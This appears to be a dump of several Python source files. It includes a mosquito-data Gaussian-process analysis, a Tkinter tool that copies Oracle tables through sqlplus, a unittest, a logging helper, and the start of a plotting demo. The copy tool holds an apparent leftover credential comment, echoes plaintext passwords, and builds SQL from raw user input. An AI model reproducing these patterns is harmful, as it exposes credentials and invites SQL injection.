center[1]\n xy_within_box = np.vstack((x_within_box, y_within_box))\n xy_within_box = np.matmul(rotation_mat, xy_within_box)\n rotated_x = xy_within_box[0] + center[0]\n rotated_y = xy_within_box[1] + center[1]\n\n # Create boolean variable\n x_window_w = (rotated_x > x_lower_box) & (rotated_x < x_upper_box)\n y_window_w = (rotated_y > y_lower_box) & (rotated_y < y_upper_box)\n x_window = rotated_x[x_window_w & y_window_w]\n y_window = rotated_y[x_window_w & y_window_w]\n\n # First conduct a regression on the 2014 data set\n # ChangeParam\n histo_f, y_edges_f, x_edges_f = np.histogram2d(y_window, x_window, bins=n_quads)\n x_mesh_plot_f, y_mesh_plot_f = np.meshgrid(x_edges_f, y_edges_f) # creating mesh-grid for use\n x_mesh_f = x_mesh_plot_f[:-1, :-1] # Removing extra rows and columns due to edges\n y_mesh_f = y_mesh_plot_f[:-1, :-1]\n x_quad_f = fn.row_create(x_mesh_f) # Creating the rows from the mesh\n y_quad_f = fn.row_create(y_mesh_f)\n\n # Note that over here, we do not have to consider the alignment of quad centers\n\n # Stack x and y coordinates together\n xy_quad = np.vstack((x_quad_f, y_quad_f))\n # Create histogram array\n k_quad = fn.row_create(histo_f)\n\n # Being tabulating log marginal likelihood after optimizing for kernel hyper-parameters\n\n initial_hyperparam = np.array([3, 2, 1, 1]) # Note that this initial condition should be close to actual\n # Set up tuple for arguments\n args_hyperparam = (xy_quad, k_quad, kernel)\n\n # Start Optimization Algorithm\n hyperparam_solution = scopt.minimize(fun=short_log_integrand_data, args=args_hyperparam, x0=initial_hyperparam,\n method='Nelder-Mead',\n options={'xatol': 1, 'fatol': 1, 'disp': True, 'maxfev': 10000})\n\n # Extract Log_likelihood value\n neg_log_likelihood = hyperparam_solution.fun # Eventually, we will have to minimize the negative log likelihood\n # Hence, this is actually an optimization nested within another optimization algorithm\n return neg_log_likelihood\n\n\n# ------------------------------------------ Start of Data Collection\n\naedes_df = pd.read_csv('Aedes_PP_Data.csv') # generates dataframe from csv - zika data\n\n# Setting boolean variables required for the data\nbrazil = aedes_df['COUNTRY'] == \"Brazil\"\ntaiwan = aedes_df['COUNTRY'] == \"Taiwan\"\naegyp = aedes_df['VECTOR'] == \"Aedes aegypti\"\nalbop = aedes_df['VECTOR'] == \"Aedes albopictus\"\nyear_2014 = aedes_df['YEAR'] == \"2014\"\nyear_2013 = aedes_df['YEAR'] == \"2013\"\nyear_2012 = aedes_df['YEAR'] == \"2012\"\n\n# Extract data for Brazil and make sure to convert data type to float64\naedes_brazil = aedes_df[brazil] # Extracting Brazil Data\naedes_brazil_2014 = aedes_df[brazil & year_2014]\naedes_brazil_2013 = aedes_df[brazil & year_2013]\naedes_brazil_2012 = aedes_df[brazil & year_2012]\naedes_brazil_2013_2014 = aedes_brazil_2013 & aedes_brazil_2014\nx_2014 = aedes_brazil_2014.values[:, 5].astype('float64')\ny_2014 = aedes_brazil_2014.values[:, 4].astype('float64')\nx_2013 = aedes_brazil_2013.values[:, 5].astype('float64')\ny_2013 = aedes_brazil_2013.values[:, 4].astype('float64')\nx_2013_2014 = aedes_brazil_2013_2014.values[:, 5].astype('float64')\ny_2013_2014 = aedes_brazil_2013_2014.values[:, 4].astype('float64')\n# ------------------------------------------ End of Data Collection\n\n# ------------------------------------------ Start of defining scatter point boundary\n# Define Scatter Point Boundary\nx_upper_box = -35\nx_lower_box = -65\ny_upper_box = 0\ny_lower_box = -30\n\n# Define Boolean Variable for Scatter Points Selection\nx_range_box = (x_2013 > x_lower_box) & (x_2013 < x_upper_box)\ny_range_box = (y_2013 > y_lower_box) & (y_2013 < y_upper_box)\n\nx_points = x_2013[x_range_box & y_range_box]\ny_points = y_2013[x_range_box & y_range_box]\n\n# ------------------------------------------ End of defining scatter point boundary\n\n\n# Define arguments for calculating the Log Marginal Likelihood\n# ChangeParam\nc = np.array([-50, -15])\nradius = 8\nker = 'rational_quad'\nquads_on_side = 10\nxy_points = np.vstack((x_points, y_points)) # This refers to all the points that are being rotated\n# reg_limit = (-43, -63, -2, -22) # x_upper, x_lower, y_upper, y_lower\n# Define regression window which actually remains the same\nx_upper = c[0] + radius\nx_lower = c[0] - radius\ny_upper = c[1] + radius\ny_lower = c[1] - radius\n\n# Starting iteration point for angle\n# ChangeParam\nangle_limit = 90\nangle_step = 0.5\nangle_array = np.arange(0, angle_limit + angle_step, angle_step)\nprint('The angle array is ', angle_array)\n\n# Initialise array to store log_likelihood_values\nlikelihood_array = np.zeros_like(angle_array)\nprint('The Initial likelihood array is ', likelihood_array)\n\nstart_likelihood_tab = time.clock()\n\n# For each angle, re-tabulate the optimal hyper_parameters and calculate the log_likelihood\nfor i in range(angle_array.size):\n # Rotate Data Points that are beyond the regression window\n rotated_xy = fn.rotate_array_iterate(angle_array[i], xy_points, c)\n rotated_x = rotated_xy[0]\n rotated_y = rotated_xy[1]\n\n print('Rotated xy is ', rotated_xy)\n # Define regression limits\n # Create Boolean Variable\n x_window = (rotated_x > x_lower) & (rotated_x < x_upper)\n y_window = (rotated_y > y_lower) & (rotated_y < y_upper)\n x_within_window = rotated_x[x_window & y_window]\n y_within_window = rotated_y[x_window & y_window]\n # These are the coordinates of points within the regression window\n\n # Generate Histogram from the coordinates of points above\n histo, y_edges, x_edges = np.histogram2d(y_within_window, x_within_window, bins=quads_on_side)\n x_mesh, y_mesh = np.meshgrid(x_edges, y_edges) # creating mesh-grid for use\n x_mesh = x_mesh[:-1, :-1] # Removing extra rows and columns due to edges\n y_mesh = y_mesh[:-1, :-1]\n x_quad = fn.row_create(x_mesh) # Creating the rows from the mesh\n y_quad = fn.row_create(y_mesh)\n k_quad = fn.row_create(histo)\n xy_quad = np.vstack((x_quad, y_quad))\n\n # Initialise arguments for hyper-parameter optimization\n arguments = (xy_quad, k_quad, ker)\n\n # Initialise kernel hyper-parameters\n initial_hyperparameters = np.array([3, 2, 1, 1])\n\n print('The current angle of rotation is ', angle_array[i])\n # Start optimization\n solution = scopt.minimize(fun=short_log_integrand_data, args=arguments, x0=initial_hyperparameters,\n method='Nelder-Mead',\n options={'xatol': 1, 'fatol': 1, 'disp': True, 'maxfev': 1000})\n # Over here, not really concerned about value of hyper-parameters, just the likelihood\n likelihood_array[i] = -1 * solution.fun # A log likelihood value for each i\n\n\nangle_opt_index = np.argmax(likelihood_array) # This gives the index of the maximum angle\nangle_opt = angle_array[angle_opt_index]\nprint('The Log_likelihood Array is ', likelihood_array)\nprint('The Optimal Angle is ', angle_opt)\n\ntime_likelihood_tab = time.clock() - start_likelihood_tab\nprint('Time taken for Angle Iteration =', time_likelihood_tab)\n\nrotated_xy_within_window = fn.rotate_array_iterate(angle_opt, xy_points, c)\nx_rotated = rotated_xy_within_window[0]\ny_rotated = rotated_xy_within_window[1]\n\n# ------------------------------------------ Compute the Posterior using angle_opt\n# Create Likelihood Array for Plotting\nlikelihood_array_plot = np.hstack((likelihood_array, likelihood_array[1:]))\nangle_array_plot = np.arange(0, (2*angle_limit) + angle_step, angle_step)\n\n\n# Quick plot for log likelihood versus angle in degrees\nfig_likelihood_plot = plt.figure()\nlikelihood_plot = fig_likelihood_plot.add_subplot(111)\nlikelihood_plot.plot(angle_array, likelihood_array, color='black')\nlikelihood_plot.set_title('Plot of Log Marginal Likelihood against Rotation Angle')\nlikelihood_plot.set_xlabel('Rotation Angle in Degrees')\nlikelihood_plot.set_ylabel('Log Marginal Likelihood')\n\n# Quick Plot for 2 periods\nfig_likelihood_plot_2 = plt.figure()\nlikelihood_plot_2 = fig_likelihood_plot_2.add_subplot(111)\nlikelihood_plot_2.plot(angle_array_plot, likelihood_array_plot, color='black')\nlikelihood_plot_2.set_title('Plot of Log Marginal Likelihood against Rotation Angle')\nlikelihood_plot_2.set_xlabel('Rotation Angle in Degrees')\nlikelihood_plot_2.set_ylabel('Log Marginal Likelihood')\n\nplt.show()\n\n# ------------------------------------------ Start of rebuilding based on optimal angle\n\n\n# ChangeParam\n\"\"\"\nfig_brazil_scatter = plt.figure()\nbrazil_scatter = fig_brazil_scatter.add_subplot(111)\n# brazil_scatter.scatter(x_2014, y_2014, marker='.', color='blue', s=0.1)\nbrazil_scatter.scatter(x_2013, y_2013, marker='.', color='black', s=0.3)\n# plt.legend([pp_2014, pp_2013], [\"2014\", \"2013\"])\nbrazil_scatter.set_title('Brazil 2013 Aedes Scatter')\n# brazil_scatter.set_xlim(x_lower, x_upper)\n# brazil_scatter.set_ylim(y_lower, y_upper)\nbrazil_scatter.set_xlabel('UTM Horizontal Coordinate')\nbrazil_scatter.set_ylabel('UTM Vertical Coordinate')\n\n\nfig_brazil_histogram = plt.figure()\nbrazil_histogram = fig_brazil_histogram.add_subplot(111)\nbrazil_histogram.pcolor(x_mesh_plot, y_mesh_plot, histo, cmap='YlOrBr')\nbrazil_histogram.scatter(x_2013, y_2013, marker='.', color='black', s=0.3)\nhistogram_circle = plt.Circle((-50, -15), 11.3, fill=False, color='orange')\nbrazil_histogram.add_patch(histogram_circle)\nbrazil_histogram.set_title('Brazil 2013 Aedes Histogram')\n# brazil_histogram.set_xlim(x_lower, x_upper)\n# brazil_histogram.set_ylim(y_lower, y_upper)\nbrazil_histogram.set_xlabel('UTM Horizontal Coordinate')\nbrazil_histogram.set_ylabel('UTM Vertical Coordinate')\n\n\nplt.show()\n\n\"\"\"\n\n\n","sub_path":"Square_Rotation_Iterate.py","file_name":"Square_Rotation_Iterate.py","file_ext":"py","file_size_in_byte":37551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"450487505","text":"# MDR Copy\n# Copys eDocs between MDR environments based on user input data\n\nfrom tkinter import *\nfrom subprocess import Popen, PIPE\nfrom time import sleep\n\nconnectStringNoLog = '/nolog'\n\ndatArray = ['SASP_EXTRACT_CTRL','V_SASP_HDR','V_SASP_SEG','V_SASP_MPU','V_SASP_MCR','V_SASP_MPA',\n 'V_SASP_CPT','V_SASP_CSM','V_SASP_CQT','V_SASP_PQT','V_SASP_IMR','V_SASP_PDR','V_SASP_PBC',\n 'V_SASP_PAR','V_SASP_JOB_STATUS','V_POSTG_STMT_CSM_MAP','V_POSTG_STMT_CQT_MAP','V_POSTG_STMT_STATUS']\nxmlArray = ['SASP_EXTRACT_CTRL','V_MAILING_GROUP','V_QUAL_REPORT','V_QUAL_CONTAINER','V_QUAL_CTR_DETAIL','V_POSTG_STMT_HEADER',\n 'V_BNDL_DETAIL','V_PIECE_RANGE','V_MAIL_PIECE','V_POSTG_ADJUSTMENT','V_PS_CTR_INFO_MAP']\npwArray = ['PW_SASP_FIN_INTF_CTRL','SASP_POSTAGE_STATEMENT_VIEW','PW_FS_IMD_ASSESSMENT','PW_POS_DATA']\ndatCopalTrayArray = ['SASP_EXTRACT_CTRL_POST_FIN','V_SASP_HDR_TRAY','V_SASP_SEG_TRAY','V_SASP_MPU_TRAY','V_SASP_MCR_TRAY',\n 'V_SASP_MPA_TRAY','V_SASP_CPT_TRAY','V_SASP_CSM_TRAY','V_SASP_CQT_TRAY','V_SASP_PQT_TRAY','V_SASP_IMR_TRAY',\n 'V_SASP_PDR_TRAY','V_SASP_PBC_TRAY','V_SASP_OCI_TRAY','V_SASP_JOB_STATUS_TRAY','V_POSTG_STMT_CSM_MAP_TRAY',\n 'V_POSTG_STMT_STATUS_TRAY','V_SASP_CSM_POST_FIN']\ndatCopalBndlArray = ['SASP_EXTRACT_CTRL_POST_FIN','V_SASP_HDR_BNDL','V_SASP_SEG_ BNDL','V_SASP_MPU_ BNDL','V_SASP_MCR_ BNDL',\n 'V_SASP_MPA_ BNDL','V_SASP_CPT_ BNDL','V_SASP_CSM_ BNDL','V_SASP_CQT_ BNDL','V_SASP_PQT_ BNDL',\n 'V_SASP_IMR_ BNDL','V_SASP_PDR_ BNDL','V_SASP_PBC_BNDL','V_SASP_OCI_ BNDL','V_SASP_JOB_STATUS_BNDL',\n 'V_POSTG_STMT_CSM_MAP_BNDL','V_POSTG_STMT_STATUS_BNDL','V_SASP_CSM_POST_FIN']\nxmlCopalTrayArray = ['SASP_EXTRACT_CTRL_POST_FIN','V_MAILING_GROUP_TRAY','V_QUAL_REPORT_TRAY','V_QUAL_CONTAINER_TRAY',\n 'V_QUAL_CTR_DETL_TRAY','V_POSTG_STMT_HEADER_TRAY','V_BNDL_DETAIL_TRAY','V_PIECE_RANGE_TRAY',\n 'V_MAIL_PIECE_TRAY','V_ORIG_CTR_LINKAGE_TRAY','V_PS_CTR_INFO_MAP_TRAY','V_QUAL_CONTAINER_POST_FIN']\nxmlCopalBndlArray = ['SASP_EXTRACT_CTRL_POST_FIN','V_MAILING_GROUP_BNDL','V_QUAL_REPORT_BNDL','V_QUAL_CONTAINER_BNDL',\n 'V_QUAL_CTR_DETL_BNDL','V_POSTG_STMT_HEADER_BNDL','V_BNDL_DETAIL_BNDL','V_PIECE_RANGE_BNDL',\n 'V_MAIL_PIECE_BNDL','V_ORIG_CTR_LINKAGE_BNDL','V_PS_CTR_INFO_MAP_BNDL','V_QUAL_CONTAINER_POST_FIN']\n\n#Outputs views/tables to iterate over and condition for where clause based on the copy edoc type\ndef eDocView(eDocType):\n table = []; condition = ''\n if eDocType == \"Mail.dat\": table = datArray; condition = 'SASP_CTRL_SEQ_ID';\n elif eDocType == \"Mail.xml\": table = xmlArray; condition = 'SASP_CTRL_SEQ_ID';\n elif eDocType == \"PW/IMsb\": table = pwArray; condition = 'POSTG_STMT_SEQ_NBR';\n elif eDocType == \"Tray Copal (dat)\": table = datCopalTrayArray; condition = 'SASP_POST_FIN_EXTRACT_CTRL_SEQ_ID';\n elif eDocType == \"Bundle Copal (dat)\": table = datCopalBndlArray; condition = 'SASP_POST_FIN_EXTRACT_CTRL_SEQ_ID';\n elif eDocType == \"Tray Copal (xml)\": table = xmlCopalTrayArray; condition = 'SASP_POST_FIN_EXTRACT_CTRL_SEQ_ID';\n elif eDocType == \"Bundle Copal (xml)\": table = xmlCopalBndlArray; condition = 'SASP_POST_FIN_EXTRACT_CTRL_SEQ_ID';\n return table, condition\n \n#function that takes the sqlCommand and connectString and retuns the output and #error string (if any)\ndef runSqlQuery(sqlCommand, connectString):\n session = Popen(['sqlplus', '-S', connectString], stdin=PIPE, stdout=PIPE, stderr=PIPE)\n session.stdin.write(sqlCommand)\n return session.communicate()\n\ndef sqlSelects(table, owner):\n sqlCommands = []\n sqlCommandCol = bytes(\"SELECT column_name from all_tab_columns where owner = '%s' and table_name = '%s';\"%(owner,table),'UTF-8')\n sqlCommandType = bytes(\"SELECT data_type from all_tab_columns where owner = '%s' and table_name = '%s';\"%(owner,table),'UTF-8')\n sqlCommandLeng = bytes(\"SELECT coalesce(data_precision,data_length) DATA_LENG from all_tab_columns where owner = '%s' and table_name = '%s';\"\n %(owner,table),'UTF-8')\n sqlCommandNull = bytes(\"SELECT nullable NULL_IND from all_tab_columns where owner = '%s' and table_name = '%s';\"%(owner,table),'UTF-8')\n sqlCommands = [sqlCommandCol, sqlCommandType, sqlCommandLeng, sqlCommandNull]\n return sqlCommands\n \n#function to find all input instances within a string. Used for formatting.\ndef findAll(string, search):\n locList = [loc for loc in range(0,len(string)) if string.find(search, loc) == loc]\n return locList\n \n#Converts the sqlQueryConnect results into a usable list\ndef convertList(connectRes):\n tempArray = connectRes[:]\n newTblDesc = []\n #removing the string values (\\t = tab, \\r = return), find and create new lines \\n\n #to make string into a useable list\n tempArray = tempArray.replace('\\t ','')\n tempArray = tempArray.replace('\\t','')\n tempArray = tempArray.replace('\\r','')\n lineLoc = findAll(tempArray, '\\n')\n #loop through locations for new lines and append up to them as new lines within the array\n prev = 0\n for i in lineLoc: \n newTblDesc.append(tempArray[prev:i])\n prev = i+1\n return newTblDesc\n\n#Cleans description list to only provide column names and attributes.\ndef cleanQuery(descArray):\n finalDesc = []\n for line in descArray:\n if line[0] != 'COLUMN_NAME' and line[0] != '' and line[0][0] != '-':\n finalDesc.append(line)\n del finalDesc[-1]\n return finalDesc\n\ndef tableDescribe(sqlCommands, connectString):\n allQueryRes = []; finalDesc = []; \n #loop through each of the sqlCommands for description of the input table\n for inputQry in sqlCommands:\n visPrint = []\n queryResult = ''\n queryResult, errorMessage = runSqlQuery(inputQry, connectString)\n #decode from bytes to string\n decPrint = queryResult.decode(\"UTF-8\")\n visPrint = convertList(decPrint)\n visLeng = len(visPrint)\n #If nothing is in the list already then add as a new list.\n #This is so each line returned has the column name, type, length, and nullable\n #as an iterable list\n for a in range(0,visLeng):\n if len(allQueryRes) == visLeng: allQueryRes[a].append(visPrint[a])\n else: allQueryRes.append([visPrint[a]])\n #cleans up the list for usability\n finalDesc = cleanQuery(allQueryRes)\n return finalDesc\n\n#Corrects instances where source and target attributes mismatche (length, type, null). \ndef attributeValid(matchedColName, sourceDictVal, targDictVal):\n selectRecord = ''; selectStmt = ''\n selectRecord = matchedColName\n selectEnd = ' AS ' + matchedColName\n if sourceDictVal != targDictVal:\n sourceLeng = sourceDictVal[1]; sourceType = sourceDictVal[0]; sourceNull = sourceDictVal[2]\n targLeng = targDictVal[1]; targType = targDictVal[0]; targNull = targDictVal[2]\n convertTo = []\n lengCond = 0\n if sourceLeng > targLeng:\n selectRecord = 'SUBSTR('+matchedColName+',1,'+targLeng+')'\n lengCond = 1\n if sourceType != targType or lengCond == 1:\n if targType == 'DATE': convertTo = ['TO_DATE(',\",'YYYYMMDD')\"]\n elif targType == 'NUMBER': convertTo = ['TO_NUMBER(',')']\n elif targType == 'VARCHAR2': convertTo = ['TO_CHAR(',')']\n selectRecord = convertTo[0] + selectRecord + convertTo[1]\n if sourceNull != targNull:\n if targNull == 'Y': selectRecord = selectRecord\n else:\n if targType == 'DATE': convertTo = [\"TO_DATE('20130101','YYYYMMDD')\"]\n elif targType == 'NUMBER': convertTo = ['TO_NUMBER(1)']\n elif targType == 'VARCHAR2': convertTo = ['TO_CHAR(1)']\n selectRecord = ('CASE WHEN ' + matchedColName + ' IS NOT NULL THEN ' + selectRecord + ' ELSE ' + convertTo[0]\n + ' END')\n selectStmt = selectRecord + selectEnd\n return selectStmt\n\n#Handles target columns that dont exist in source environment.\ndef attNoMatch(noMatchColName, targDictVal):\n targLeng = targDictVal[1]; targType = targDictVal[0]; targNull = targDictVal[2]\n selectRecord = ''; convertTo = ''\n selectRecord = noMatchColName\n if targNull == 'Y': selectRecord = 'NULL AS ' + selectRecord\n else:\n if targType == 'DATE': convertTo = \"TO_DATE('20130101','YYYYMMDD') AS \"\n elif targType == 'NUMBER': convertTo = 'TO_NUMBER(1) AS '\n elif targType == 'VARCHAR2': convertTo = 'TO_CHAR(1) AS '\n selectRecord = convertTo + selectRecord\n return selectRecord\n\n#Compares source table description to the target. If there are more columns in the source,\n#they will not be selected. If there are more columns in the target they will be selected as Null values\n#unless those fields are not nullable, in which case they will be defaulted to a random date or number.\n#The final output is an Array list to be used in the select query.\ndef columnCompare(sourceArrayFunc, targetArrayFunc):\n lenghtSource = len(sourceArrayFunc); lengthTarget = len(targetArrayFunc)\n selectArray = [];\n sourceColName = []; targColName = []\n sourceDict = {}; targDict = {}\n for sRowNum in range(0,lenghtSource):\n sourceColName.append(sourceArrayFunc[sRowNum][0])\n sourceDict[sourceArrayFunc[sRowNum][0]] = sourceArrayFunc[sRowNum][1:]\n for tRowNum in range(0,lengthTarget):\n targColName.append(targetArrayFunc[tRowNum][0])\n targDict[targetArrayFunc[tRowNum][0]] = targetArrayFunc[tRowNum][1:]\n colMatch = [tmpCol for tmpCol in targColName if tmpCol in sourceColName]\n colNoMatch = [tmpCol for tmpCol in targColName if tmpCol not in sourceColName]\n for matchedColName in colMatch:\n sourceDictVal = []; targDictVal = [];\n sourceDictVal = sourceDict[matchedColName]; targDictVal = targDict[matchedColName]\n selectRecord = attributeValid(matchedColName, sourceDictVal, targDictVal)\n selectArray.append(selectRecord)\n for noMatchColName in colNoMatch:\n targDictVal = []; targDictVal = targDict[noMatchColName]\n selectRecord = attNoMatch(noMatchColName, targDictVal)\n selectArray.append(selectRecord)\n return selectArray\n\n#Converts select list into a clean string\ndef stringSelect(selectList):\n #Put the select query together\n colSelStr = ''\n for v in range(0,len(selectList)):\n if v == (len(selectList)-1): colSelStr = colSelStr + selectList[v] + ''\n else: colSelStr = colSelStr + selectList[v] + ', '\n return colSelStr\n\n#Cleans and provides results from copy statement.\ndef results(noLogInfo):\n outputRes = ''\n decPrint = noLogInfo.decode(\"UTF-8\")\n visPrint = convertList(decPrint)\n for outputLine in visPrint[(len(visPrint)-3):]:\n outputRes = outputRes + outputLine\n return outputRes\n\nclass Application(Frame):\n \"\"\" GUI application that copys eDocs between MDR environments. \"\"\"\n def __init__(self, master):\n \"\"\" Initialize Frame. \"\"\"\n super(Application, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\" Create widgets to get info for copy statements. \"\"\"\n # create instruction label\n Label(self,\n text = \"Enter eDoc information to copy\"\n ).grid(row = 0, column = 0, columnspan = 2, sticky = W)\n\n # create a label and text entry for the source schema identifier\n Label(self,\n text = \"Schema copying FROM \\n(i.e. MDRCENTRAL,SASP_R16_TST0): \"\n ).grid(row = 1, column = 0, sticky = W)\n self.source_owner_ent = Entry(self)\n self.source_owner_ent.grid(row = 1, column = 1, sticky = W)\n\n # create a label and text entry for the source username \n Label(self,\n text = \"Source username: \"\n ).grid(row = 2, column = 0, sticky = W)\n self.source_user_ent = Entry(self)\n self.source_user_ent.grid(row = 2, column = 1, sticky = W)\n\n # create a label and text entry for the source password \n Label(self,\n text = \"Source Password: \"\n ).grid(row = 3, column = 0, sticky = W)\n self.source_pwrd_ent = Entry(self)\n self.source_pwrd_ent.grid(row = 3, column = 1, sticky = W)\n\n # create a label and text entry for the source DB identifier \n Label(self,\n text = \"Source DB identifier: \"\n ).grid(row = 4, column = 0, sticky = W)\n self.source_db_ent = Entry(self)\n self.source_db_ent.grid(row = 4, column = 1, sticky = W)\n \n # create a label and text entry for the target schema identifier\n Label(self,\n text = (\"Schema copying TO \\n (i.e. MDRCENTRAL,SASP_R16_TST0): \")\n ).grid(row = 1, column = 2, sticky = W)\n self.target_owner_ent = Entry(self)\n self.target_owner_ent.grid(row = 1, column = 3, sticky = W)\n\n # create a label and text entry for the target username \n Label(self,\n text = \"Target username: \"\n ).grid(row = 2, column = 2, sticky = W)\n self.target_user_ent = Entry(self)\n self.target_user_ent.grid(row = 2, column = 3, sticky = W)\n\n # create a label and text entry for the target password \n Label(self,\n text = \"Target Password: \"\n ).grid(row = 3, column = 2, sticky = W)\n self.target_pwrd_ent = Entry(self)\n self.target_pwrd_ent.grid(row = 3, column = 3, sticky = W)\n\n # create a label and text entry for the target DB identifier \n Label(self,\n text = \"Target DB identifier: \"\n ).grid(row = 4, column = 2, sticky = W)\n self.target_db_ent = Entry(self)\n self.target_db_ent.grid(row = 4, column = 3, sticky = W)\n\n # create a label for eDoc Type radio buttons\n Label(self,\n text = \"eDoc Type:\"\n ).grid(row = 5, column = 0, sticky = W)\n\n # create variable for a single eDoc type\n self.edoc_type = StringVar()\n self.edoc_type.set(None)\n\n # create body part radio buttons\n edoc_type = [[\"Mail.dat\", \"Mail.xml\", \"PW/IMsb\"],\n [\"Tray Copal (dat)\", \"Bundle Copal (dat)\"],\n [\"Tray Copal (xml)\", \"Bundle Copal (xml)\"]]\n row = 5\n for rowList in edoc_type:\n column = 1\n for edoc in rowList:\n Radiobutton(self,\n text = edoc,\n variable = self.edoc_type,\n value = edoc\n ).grid(row = row, column = column, sticky = W)\n column += 1\n row += 1\n\n Label(self,\n text = \"Control Seq Id to Copy\\n (PW/IMSB - Seq NBR): \",\n anchor=\"w\",fg=\"black\",bg=\"yellow\").grid(row = 9, column = 0, sticky = W)\n self.seq_ent = Entry(self)\n self.seq_ent.grid(row = 9, column = 1, sticky = W)\n \n # create a submit button\n Button(self,\n text = \"Click to copy\",\n command = self.copy_data\n ).grid(row = 10, column = 0, sticky = W)\n\n self.story_txt = Text(self, width = 75, height = 10, wrap = WORD)\n self.story_txt.grid(row = 12, column = 0, columnspan = 4)\n\n def copy_data(self):\n \"\"\" Fill text box with copy information based on user input. \"\"\"\n # get values from the GUI\n #WEBADMIN#ADMINWEB#SIT, 3811725\n sourceOwner = self.source_owner_ent.get()\n sourceUserName = self.source_user_ent.get()\n sourcePwrd = self.source_pwrd_ent.get()\n sourceDB = self.source_db_ent.get()\n targetOwner = self.target_owner_ent.get()\n targetUserName = self.target_user_ent.get()\n targetPwrd = self.target_pwrd_ent.get()\n targetDB = self.target_db_ent.get()\n sourceConnectString = sourceUserName + '/' + sourcePwrd + '@' + sourceDB\n targetConnectString = targetUserName + '/' + targetPwrd + '@' + targetDB\n eDocType = self.edoc_type.get()\n record = self.seq_ent.get()\n outputMessage = []\n \n story = \"Copying data from \"\n story += sourceConnectString\n story += \" to \"\n story += targetConnectString + \". \"\n story += \"\\n\\n\"\n \n #use functions to do work\n selectTableList, condition = eDocView(eDocType)\n for tableName in selectTableList:\n SourceSqlCommands = sqlSelects(tableName, sourceOwner)\n targetSqlCommands = sqlSelects(tableName, targetOwner)\n sourceArrayFunc = tableDescribe(SourceSqlCommands, sourceConnectString)\n targetArrayFunc = tableDescribe(targetSqlCommands, targetConnectString)\n selectList = columnCompare(sourceArrayFunc, targetArrayFunc)\n colSelStr = stringSelect(selectList)\n query = ('Copy from ' + sourceConnectString + ' to ' + targetConnectString +\n ' insert ' + targetOwner + '.' + tableName + ' using select ' + colSelStr +\n ' from ' + sourceOwner + '.' + tableName + ' where ' + condition + ' = ' + str(record)\n + ' and rownum<400000;')\n copySqlCommand = bytes('Set arraysize 5000 \\n Set copycommit 4 \\n %s' %query,'UTF-8')\n noLogResult, noLogError = runSqlQuery(copySqlCommand, connectStringNoLog)\n resultMessage = results(noLogResult)\n outputMessage.append([tableName, resultMessage])\n \n # create the story\n sleep(10)\n for tableResults in outputMessage:\n story += str(tableResults)\n story += \"\\n\"\n story += \"\\n\"\n \n # display the story\n self.story_txt.delete(0.0, END)\n self.story_txt.insert(0.0, story)\n\n# main\nroot = Tk()\nroot.title(\"MDR Copy\")\napp = Application(root)\nroot.mainloop()\n","sub_path":"Python/sqlCopy/archive/sqlPythonCopyGUI.py","file_name":"sqlPythonCopyGUI.py","file_ext":"py","file_size_in_byte":18147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185616652","text":"#!/usr/bin/python3\n\"\"\"\n Unittester for the AirBnB project\n\"\"\"\nimport unittest\nimport pep8\nfrom models.base_model import BaseModel\n\n\nclass Test_base_model(unittest.TestCase):\n \"\"\" Tester that checks whetever everything is working as intended \"\"\"\n\n def test_pep8_pycodestyle(self):\n \"\"\" Tester for pep8/pycodestyle \"\"\"\n pep8style = pep8.StyleGuide(quiet=True)\n result = pep8style.check_files(['models/base_model.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors, please fix them\")\n\n def test_instanceof_itself(self):\n \"\"\" Tester to see if he is an instance of BaseModel \"\"\"\n my_model = BaseModel()\n my_model.name = \"Holberton\"\n my_model.my_number = 89\n self.assertTrue(isinstance(my_model, BaseModel))\n\n def test_checkif_docstring(self):\n \"\"\" Tester to see if the function is correctly documented \"\"\"\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"165763081","text":"\"\"\"\r\napp.com_data.writ_exeption_into_log\r\n---------------------------------------------------------------\r\nВынесенный модуль для обработки сообщений ошибок в журнал *.log\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\narg_mes: строка, место в коде возникновения исключения\r\narg_except: само сообщение исключения\r\n\"\"\"\r\ndef PM_write_except_into_log(arg_mes, arg_except):\r\n \"\"\" Процедура на уровне модуля app.com_serv_dbase.serv_modf_profil\r\n Запись текста исключения в журнал *.log \r\n ----------------------------------------------------------------\r\n arg_mes базовая строка для конфигурирования строки журнала *.log\r\n arg_except строка детализации сообщения \"\"\"\r\n\r\n from app import TypeError_system, ErrorRun_impl\r\n \r\n \"\"\" тип и уровень сообщения определяется в arg_mes: verify, ValueError, SyntaxError, ...\r\n на пример: SyntaxError##текст сообщения исключения \"\"\"\r\n s_mes = '{0} {1}'.format(arg_mes, arg_except)\r\n TypeError_system(ErrorRun_impl(s_mes)) # запись в файл app/loggin/*.log\r\n\r\n\r\n\r\ndef PM_run_raise(s_arg, showMes=None):\r\n \"\"\" Обработчик исключения в структуре кода \r\n s_arg сообщение исключения\r\n showMes=True -> сообщение будет использовано для браузера\r\n showMEs=False -> ErrorRun_impl данные будут записаны в журнал \r\n через цепочку присвоения res_proc.error=ErrorRun_impl -> TypeError_system(value)\r\n поэтому s_arg д/быть сформирован с учетом формата сообщПомещяемых в *.log\r\n \"\"\"\r\n\r\n from app import ErrorRun_impl\r\n\r\n s_err = 'встраиваемый шаблон'\r\n\r\n if showMes: \r\n raise ErrorRun_impl('verify##{0}'.format(s_arg))\r\n else:\r\n raise ErrorRun_impl('{0} {1}'.format(s_err, s_arg))","sub_path":"app/com_data/write_exception_into_log.py","file_name":"write_exception_into_log.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"175323250","text":"'''\n======================\n3D surface (color map)\n======================\n\nDemonstrates plotting a 3D surface colored with the coolwarm color map.\nThe surface is made opaque by using 